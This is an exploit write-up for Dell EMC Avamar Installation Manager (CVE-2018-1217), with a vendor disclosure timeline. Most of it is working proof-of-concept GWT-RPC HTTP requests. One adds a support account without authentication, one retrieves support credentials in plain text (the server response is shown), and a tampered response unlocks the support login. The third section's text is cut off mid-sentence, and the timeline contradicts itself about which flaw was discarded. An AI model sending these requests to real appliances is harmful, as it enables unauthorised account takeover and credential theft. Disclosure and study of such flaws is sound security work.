# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)] # Date: [24/11/2017] # Exploit Author: [SlidingWindow] # Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition] # Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1] # Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183] # CVE : [CVE-2018-1217] ================== #Product:- ================== EMC Avamar Virtual Edition is great for enterprise backup data protection for small and medium sized offices. EMC Avamar Virtual Edition is optimized for backup and recovery of virtual and physical servers,enterprise applications,remote offices,and desktops or laptops. ================== #Vulnerability:- ================== Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025) ======================== #Vulnerability Details:- ======================== ===================================================================================================================================================== 1. Missing functional level access control allows an unauthenticated user to add DELL EMC Support Account to the Installation Manager (CVE-2018-1217) ===================================================================================================================================================== DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could add an Online Support Account for DELL EMC without any user interaction. #Proof-Of-Concept: ------------------ 1. Send following request to the target: POST /avi/avigui/avigwt HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/x-gwt-rpc; charset=utf-8 X-GWT-Permutation: 8EGHBE4312AFBC12325324123DF4545A X-GWT-Module-Base: https:///avi/avigui/ Referer: https:///avi/avigui.html Content-Length: 452 Connection: close 7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7| 2. Log into Avamar Installation Manager and navigate to Configuration tab to make sure that the user 'hacker' was added successfully. ========================================================================================================================================================= 2. Missing functional level access control allows an unauthenticated user to retrieve DELL EMC Support Account Credentials in Plain Text (CVE-2018-1217) ========================================================================================================================================================= DELL EMC Avamar fails to restrict access to Configuration section that let Administrators set up Installation Manager configurations, or check for new packages from the Online Support site. An unauthenticated, remote attacker could retrieve Online Support Account password in plain text. #Proof-Of-Concept: ------------------ 1. Send following request to the target: POST /avi/avigui/avigwt HTTP/1.1 Host: Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Content-Type: text/x-gwt-rpc; charset=utf-8 X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 DNT: 1 Content-Length: 192 7|0|6|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611||1|2|3|4|2|5|5|6|0| 2. Server returns credentials in plain text: HTTP/1.1 200 OK Date: Fri, 17 Nov 2017 10:46:31 GMT Server: Jetty(9.0.6.v20130930) Content-Type: application/json; charset=utf-8 Content-Disposition: attachment Content-Length: 275 Connection: close //OK[1,["{\"proxyHost\":null,\"proxyPort\":0,\"useProxyAuthentication\":false,\"proxyUsername\":\"\",\"proxyPassword\":\"\",\"disableInternetAccess\":false,\"proxyEnable\":false,\"emcsupportUsername\":\"hacker\",\"emcsupportPassword\":\"hacked3\",\"disableLDLS\":false}"],0,7] ========================================================================================================================================================= 3. Improper validation of A< User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/x-gwt-rpc; charset=utf-8 X-GWT-Permutation: 3AF662C052F0EB9D3D51649D2293F6EC X-GWT-Module-Base: https:///avi/avigui/ Referer: https:///avi/avigui.html Content-Length: 202 Cookie: supo=x; JSESSIONID=9tt4unkdjjilbo072x4nji2y Connection: close 7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7| Tampered response: -------------------- HTTP/1.1 200 OK Date: Fri, 24Nov 2017 07:57:25 GMT Server: Jetty(9.0.6.v20130930) X-Frame-Options: SAMEORIGIN Content-Type: application/json; charset=utf-8 Content-Disposition: attachment Content-Length: 21 Connection: close //OK[1,["true"],0,7] 3. This unlocks the support account and enabled the 'Log' download button. =================================== #Vulnerability Disclosure Timeline: =================================== 11/2017: First email to disclose the vulnerability to EMC Security Response Team. 12/2017: Vendor confirmed vulnerability#1 and vulnerability#3, and discarded vulnerability#3 stating that this is an ambigious functionaliy and not a vulnerability. 12/2017: Vendor confirmed that the fix will be released in January 2018. 01/2018: Vendor delayed the fix release stating that the Dell EMC IDPA is also vulnerable.0 04/2018: Vendor assigned CVE-2018-1217 and pubished the advisory 'DSA-2018-025: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability': http://seclists.org/fulldisclosure/2018/Apr/14